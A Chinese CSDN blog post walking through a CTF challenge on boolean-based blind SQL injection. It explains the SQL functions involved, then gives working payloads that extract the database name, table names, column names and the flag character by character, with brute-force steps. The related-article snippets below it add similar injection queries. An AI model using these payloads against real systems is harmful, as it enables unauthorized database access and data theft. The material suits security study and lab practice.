【基于布尔的盲注】

于 2024-09-27 21:20:15 发布
阅读量197 收藏 4
点赞数 2
分类专栏: CTF 文章标签: 数据库 nginx 后端 服务器 运维 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45131319/article/details/142601252
版权

一、sql基础

Substr

我们看一下用法1里面的str就是我们需要截取的字符,pos是需要截取的位置,len是我们需要截取的长度,例如右边的substr('123456',1,1)意思就是截取’123456’从第一位开始截取,截取两位,到2为止,用法2里少了一个len,它就会默认从截取的位置开始,一直截取到最后一位:
请添加图片描述

if

我们看到用法里的select if(1>2,1,0);因为1小于2不满足1大于2,于是呢就返回0:
请添加图片描述

Ascii

请添加图片描述

length

下面右边的例子中database()为web,执行后正确返回了web数据库名三个的长度:
请添加图片描述

二、布尔盲注

简介

请添加图片描述

练习

我们来看一下这道题:

请添加图片描述
我们先输入1返回了user:
请添加图片描述
加上单引号看看有没有sql注入,结果什么也没有:
请添加图片描述
我们再输入2,还是显示了user:
请添加图片描述
闭合一下试试,结果还是什么都没有,说明我们的闭合有问题:
请添加图片描述
把单引号删掉,重新出现了use,那么我们之前的union和报错注入都没办法使用了,这时我们就需要用到盲注:请添加图片描述

猜长度

我们先来分析一下盲注的payload:

id=1 and length(database())=3%23

请添加图片描述
我们来测试一下,等于1没有回显:

请添加图片描述
等于3成功回显,说明我们猜对了,并正常输出:

请添加图片描述

猜数据

拿到前面的长度后,我们就可以来猜数据了:

id=1 and if((ascii(substr((select database()),1,1))=118),1,0)%23

请添加图片描述
我们直接来测试,我们第一次猜的118为v,服务器没有返回数据,说明是错的:
请添加图片描述
我们再猜119为w,服务器成功返回数据,那么数据库名的第一个字符就是w:
请添加图片描述
那么当然我们不可能是用手一个一个猜,我们使用爆破模块,使用add给119打上标记:
请添加图片描述

然后选择爆破类似为整数,起始为32到127,因为Ascii码的可见范围就是32~127,步数填1,执行后我们根据length的长度就直接找到了能成功回显的数据包为119:
请添加图片描述
我们接着猜第二位,我们只要把1改成2,就能开始第二位的爆破:
请添加图片描述
成功拿到第二位101,第三位也是同理:
请添加图片描述

猜数据库名
id=1 and if((ascii(substr((select database()),1,1))=118),1,0)%23

猜表名长度
id=1 and if((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=8,1,0)%23

猜表名
id=1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=118),1,0)%23

猜列名长度
id=1 and if((select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=7,1,0)%23

猜列名
id=1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=118),1,0)%23

猜数据长度
id=1 and if(((select length(flag) from flag)=38),1,0)%23

猜数据
id=1 and if((ascii(substr((select flag from flag),1,1))=102),1,0)%23

我们接着再猜表名的长度,把等于号后面的数字打上标记:
请添加图片描述
依旧选择数字,因为我们这是猜的表名长度,就选1~10:
请添加图片描述
成功拿到表名长度为9,拿表名、列名、数据都是同理,剩下的就不试了:
请添加图片描述

盖头盖
关注
专栏目录
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1284
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
oracle 布尔盲注,Oracle基于布尔盲注总结
weixin_32842805的博客
04-03 1074
0x01 decode函数布尔盲注decode(字段或字段的运算,值1,值2,值3)这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值sign()函数根据某个值是...
基于布尔盲注
Z_l123的博客
02-18 769
关于布尔盲注 某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语 句,查看页面的返回结果(True or False)来判断哪些sQL判断条件成立,通过此来获取数据库中的数据。 一些功能函数的说明 length(str):返回字符串(str)的长度,以字节为单位。 substr(str,pos,len):从指定的位置( pos)开始,截取并返回字符串 ( str)指定长度(len)的子串。 ascii(str):返回字符串( str)最左边字符的ASCll码。 1.访问SQLi-
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6603
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 2844
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL布尔盲注
2301_78549931的博客
08-05 966
布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,如果正确执行了构造的SQL语句,则返回一种页面,如果错误,则执行另一种页面。基于两种页面,来判断SQL语句正确与否,达到获取数据的目的。
mysql基于bool盲注,基于布尔盲注的脚本编写实例
weixin_39864261的博客
03-18 151
一个基于布尔盲注的脚本编写实例前置知识判断user长度-1 OR if((length(user())=14),1,0)查user()-1 OR if(ascii(substr(user(),1,1))=114,1,0)查database()-1 OR if(ascii(substr(database(),1,1))=114,1,0)查version()-1 OR if(ascii(substr(...
SQL注入-基于布尔盲注
Snowflake1997的博客
02-19 1374
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-8。访问的URL为: http://[靶机IP]/sqli-labs/Less-8/ 登录后,根据网页提示,给定一个?id=1的参数,即: http://[靶机IP]/sqli-labs/Less-8/?id=1 此时页面显示You are in...,显示状态未True。 如果给定一个?id=-1的参数,即: http:/.
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 3043
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
基于布尔盲注---构造逻辑判断
weixin_42350229的博客
01-14 480
文章目录基于布尔盲注---构造逻辑判断mid(column_name,start[,length]) 截取部分字符串substr()函数left()函数ord()函数ascii()函数regexp 正则注入 基于布尔盲注---构造逻辑判断 注入过程中常用的猜解字符长的函数 mid(), substr(), left() mid(column_name,start[,length]) 截取部分字符串...
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4400
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 255
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
MySQL数据库的增删改查以及基本操作分享
m0_57094953的博客
09-21 462
MySQL数据库基本操作分享,包括增删改查,登录退出,查看数据库、表等
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 716
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
JPA+Thymeleaf增删改查
最新发布
y050505的博客
09-25 424
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
No operations allowed after statement closed
abments的博客
09-20 715
错误信息:参考解决方案 https://github.com/alibaba/druid/issues/5549如果修改socket-timeout不生效,可以尝试修改 socketTimeout。
大批量查询方案简记(Mybatis流式查询)
kay'blog
09-20 1088
介绍使用mybatis流式查询解决大数据量查询问题.
post基于布尔盲注
05-05
基于布尔盲注是一种常见的SQL注入攻击技术,可以通过构造特定的SQL查询语句来获取数据库中的敏感信息。在这种攻击中,攻击者通过向受攻击的应用程序中输入恶意的SQL代码来触发漏洞。 在基于布尔盲注中,攻击者利用应用程序返回的不同响应来判断SQL查询结果是否为真或假。攻击者可以通过构造一系列的布尔查询来逐渐推断出数据库中的敏感信息。例如,攻击者可以通过构造以下查询语句来判断数据库中是否存在用户名为“admin”的记录: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND 1=1 ``` 如果应用程序返回的响应为真,那么攻击者可以通过构造以下查询语句来判断密码是否为“password”: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND password = 'password' AND 1=1 ``` 如果应用程序返回的响应为假,那么攻击者可以通过构造以下查询语句来判断密码是否为“password”: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND password <> 'password' AND 1=1 ``` 通过不断尝试构造不同的查询语句,并观察应用程序的响应,攻击者可以最终推断出数据库中的敏感信息。 为了防止基于布尔盲注攻击,应用程序应该对用户输入进行充分的验证和过滤,并使用参数化的SQL查询语句来避免SQL注入攻击。此外,应用程序还应该限制数据库用户的权限,以最小化攻击者获取敏感信息的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值